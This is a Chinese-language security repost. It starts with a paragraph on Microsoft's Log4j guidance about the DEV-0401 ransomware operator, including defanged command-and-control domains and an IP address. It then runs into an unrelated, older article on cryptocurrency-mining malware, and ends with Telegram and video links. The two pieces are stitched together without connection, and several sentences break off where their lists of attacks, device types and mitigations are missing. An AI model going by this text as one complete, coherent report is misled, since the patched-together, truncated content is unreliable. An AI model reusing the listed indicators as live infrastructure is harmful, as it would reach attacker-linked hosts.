微软更新了其Log4j漏洞指南页面,披露了一家位于中国的勒索软件运营商(DEV-0401)的相关细节,该运营商以面向互联网的系统为目标,并部署NightSky勒索软件。“早在1月4日,攻击者就开始利用运行VMware Horizon的面向互联网系统上的CVE-2021-44228漏洞,”微软写道。“DEV-0401此前曾部署过多个勒索软件家族,包括LockFile、AtomSilo和Rook,并且同样利用过运行Confluence(CVE-2021-26084)的面向互联网系统和本地Exchange服务器(CVE-2021-34473)。”根据微软的分析,攻击者被发现使用冒充合法域名的命令与控制(CnC)服务器。这些服务器包括service[.]trendmrcio[.]com、api[.]rogerscorp[.]org、api[.]sophosantivirus[.]ga、apicon[.]nvidialab[.]us、w2zmii7kjb81pfj0ped16kg8szyvmk.burpcollaborator[.]net和139[.]180[.]217[.]203。
安全入门:加密货币挖矿恶意软件的影响
澳大利亚政府刚刚承认数字货币为合法支付方式。自7月1日起,使用比特币等数字货币进行的购买免征该国的商品与服务税,以避免双重征税。因此,交易者和投资者通过合法交易平台买卖数字货币将不会被征税。
日本于去年4月将比特币合法化为一种支付形式,目前预计将有超过2万家商户接受比特币支付。其他国家也在加入这一潮流,尽管只是部分采纳:瑞士、挪威 和 荷兰 的企业 以及一些 公共组织。在最近的一项研究中,加密货币钱包的独立活跃用户数被估计在290万至580万之间,其中大部分位于北美和欧洲。
但是,数字货币的接受和采用与网络威胁有什么关系?实际上,关系很大。随着比特币等加密货币在现实世界获得越来越多的关注,滥用它们的网络犯罪威胁也会随之增长。但具体是怎样的呢?这对企业和日常用户意味着什么?
加密货币是一种表示货币单位的加密数据字符串。它由一个点对点网络(也称为区块链)进行监控和组织,该网络同时充当交易的安全账本,例如购买、出售和转账。与实物货币不同,加密货币是去中心化的,这意味着它们不由政府或其他金融机构发行。
加密货币通过加密算法创建(并保护),这些算法在一个称为挖矿的过程中得到维护和确认。在挖矿过程中,一个由计算机或专用硬件(如专用集成电路(ASIC))组成的网络处理和验证交易。该过程以加密货币激励运行网络的矿工。
实际上有700多种加密货币,但只有少数可以随时交易,市值超过1亿美元的更是少之又少。例如,比特币由中本聪(化名)创建,并于2009年作为开源代码发布。区块链技术使这一切成为可能,它提供了一个系统,其中数据结构(区块)通过通信端点(节点)网络在公开的分布式数据库中进行广播、验证和注册。
虽然比特币是最著名的加密货币,但还有其他流行的替代品。以太坊将“智能合约”提升了一个档次,使编写这些合约所需的编程语言对开发者更友好。合约(即条件/如果-那么交易)被编写为代码,并在以太坊的区块链上执行(只要满足要求)。
然而,以太坊在一名黑客利用运行在其软件上的数字自治组织(DAO)中的漏洞、盗取了价值5000万美元的以太币(以太坊的货币)后声名狼藉。这导致了基于原始区块链的以太坊经典版的开发,以及其升级版本以太坊(通过硬分叉)。
还有其他值得注意的加密货币:莱特币、狗狗币、门罗币。莱特币据称是比特币的技术改进版,能够通过其Scrypt挖矿算法(比特币使用SHA-256)实现更快的周转速度。莱特币网络能够产生8400万枚莱特币——是比特币发行量的四倍。门罗币以其使用环签名(一种数字签名)和CryptoNote应用层协议来保护其交易(金额、来源和目的地)的隐私而著称。狗狗币最初是为了教育或娱乐目的而开发的,面向更广泛的人群。它能够生成无限量的狗狗币,同样使用Scrypt来驱动这种货币。
加密货币没有国界——任何人都可以随时随地发送它们,没有延迟,也没有中间商的额外/隐藏费用。鉴于其特性,它们更不容易受到欺诈和身份盗窃的影响,因为加密货币无法伪造,个人信息处于加密保护之后。
不幸的是,加密货币同样明显的盈利能力、便利性和匿名性也使它们成为网络犯罪分子的理想选择,正如勒索软件运营商所展示的那样。加密货币日益普及的同时,感染系统和设备并将其变成加密货币挖矿机器大军的恶意软件事件也在增加。
加密货币挖矿是一项计算密集型任务,需要专用处理器、显卡和其他硬件投入大量资源。虽然挖矿确实能赚钱,但有许多注意事项。利润与矿工在硬件上的投资相关,更不用说为这些硬件供电的电费了。
加密货币以区块为单位进行挖矿;例如,在比特币中,每解决一定数量的哈希,每个区块可奖励给矿工的比特币数量就会减半。由于比特币网络被设计为每10分钟生成一次加密货币,解决下一个哈希的难度会相应调整。随着挖矿算力的增加,挖出一个新区块的资源需求也在不断累积。奖励相对较小,并且每四年会减少一次——2016年,挖出一个区块的奖励减半至12.5 BTC(截至2017年7月5日约合32,000美元)。因此,许多人联合起来组成矿池以提高挖矿效率。利润在团队之间分配,具体取决于每个矿工付出的努力。
坏人转而使用恶意软件来绕过这些挑战。然而,对于网络犯罪矿工来说有一个警告:联网设备和机器虽然处理网络数据的速度足够快,但并没有强大的计算能力。为了弥补这一点,加密货币挖矿恶意软件被设计成将计算机僵尸化,组成僵尸网络来执行这些任务。还有一些则完全不加掩饰——2014年,哈佛大学的超级计算机集群Odyssey被非法用于挖掘狗狗币。同年,美国国家科学基金会的超级计算机也发生了类似事件。2017年2月初,美国联邦储备委员会的一台服务器被滥用于挖掘比特币。
加密货币挖矿恶意软件采用与其他许多威胁相同的作案手法——从携带恶意软件的垃圾邮件和恶意URL下载,到垃圾软件和潜在不需要的应用程序(PUA)。2014年1月,雅虎基于Java的广告网络中的一个漏洞被利用,使欧洲终端用户接触到投放比特币挖矿恶意软件的恶意广告。一个月前,德国执法部门逮捕了一些黑客,他们涉嫌使用恶意软件挖掘价值超过95.4万美元的比特币。
早在2011年,我们就看到了与网络犯罪比特币挖矿相关的黑客工具和后门的出现,此后我们又看到了各种具有更多功能的加密货币挖矿威胁,例如分布式拒绝服务和URL欺骗。另一个甚至试图伪装成趋势科技某产品的组件。2014年,该威胁以Kagecoin的形式蔓延至Android设备,能够挖掘比特币、莱特币和狗狗币。一个在中东地下市场广泛流传的远程访问木马(RAT)njrat/Njw0rm被修改,添加了比特币挖矿功能。一个可以挖掘莱特币的旧版Java RAT也遭到了同样的改造。
今年迄今值得注意的加密货币挖矿恶意软件有Adylkuzz、CPUMiner/EternalMiner和Linux.MulDrop.14。它们都利用漏洞。Adylkuzz利用了EternalBlue,即WannaCry勒索软件所利用的造成破坏性影响的安全漏洞,而CPUMiner/EternalMiner利用了SambaCry,这是互操作性软件套件Samba中的一个漏洞。Linux.MulDrop.14是一个Linux木马,目标是Raspberry Pi设备。这些威胁感染设备和机器,将其变成挖掘门罗币的僵尸网络。
加密货币挖矿恶意软件窃取受感染机器的资源,严重影响其性能并加剧其损耗。感染还涉及其他成本,例如电力消耗增加。
但我们也发现,它们的影响超出了性能问题。从2017年1月1日到6月24日,我们的传感器检测到4,894个比特币挖矿程序,触发了超过460,259次比特币挖矿活动,并发现其中超过20%的挖矿程序还触发了基于Web和网络的攻击。我们甚至发现了与勒索软件攻击途径相关的入侵尝试。我们观察到的最普遍的此类攻击包括:
这些恶意软件可能威胁网络或系统的可用性、完整性和安全性,从而可能导致企业的关键任务运营中断。信息窃取和系统劫持也是令人担忧的后果。这些攻击还可能成为其他恶意软件的传播渠道。
物联网(IoT)设备也是加密货币挖矿恶意软件的目标——从数字视频录像机(DVR)/监控摄像头、机顶盒、网络附加存储(NAS)设备,尤其是路由器,因为它们在家庭和企业环境中无处不在。2017年4月,一种具有比特币挖矿功能的Mirai变种出现。Mirai的恶名源于它对物联网设备(尤其是家用路由器)造成的破坏,去年它利用这些设备将高知名度网站打下线。在2016年前三个季度,我们检测到一支由Windows系统、家用路由器和IP摄像头组成的比特币挖矿僵尸大军。
从2017年1月1日到6月24日,我们还观察到各种不同类型的设备在挖掘比特币,尽管我们的遥测数据无法验证这些活动是否经过授权。我们还看到比特币挖矿活动激增了40%,从2017年2月每天触发1,800个事件增加到3月的3,000个。
虽然比特币挖矿本身并不违法(至少在许多国家如此),但如果未经所有者的知情和同意,它可能意味着系统受到危害。我们发现运行Windows的机器的比特币挖矿活动最多,但同样值得注意的还有:
[阅读: 如何保护你的路由器免受Mirai和家庭网络攻击]
加密货币挖矿恶意软件会损害系统性能,使终端用户和企业面临信息窃取、劫持以及大量其他恶意软件的风险。而通过将这些机器变成僵尸,加密货币恶意软件甚至可能在无意中让受害者成为问题的一部分。
事实上,它们对被感染设备(最终是企业的资产或用户的数据)造成的不利影响,使其成为切实的威胁。这些恶意软件没有万灵药,但可以通过遵循以下最佳实践来缓解:
IT/系统管理员和信息安全专业人员还可以考虑 应用程序白名单 或类似的安全机制,以防止可疑的可执行文件运行或安装。主动监控网络流量有助于更好地识别可能表明恶意软件感染的危险信号。应用最小权限原则、制定 针对 Web 注入的应对措施, 保护电子邮件网关安全, 为企业移动设备实施最佳实践, 以及培养具有网络安全意识的员工队伍,都是纵深防御方法的一部分,旨在减少企业面临这些威胁的风险。然而,归根结底,联网设备抵御加密货币挖矿恶意软件的安全不仅仅是用户的责任。原始设计和设备制造商也在保护其运行的生态系统方面发挥着重要作用。
Telegram: https://t.me/cryptodeeptech
视频: https://youtu.be/PNDBjoT83zA
来源: https://cryptodeeptech.ru/log4j-vulnerability
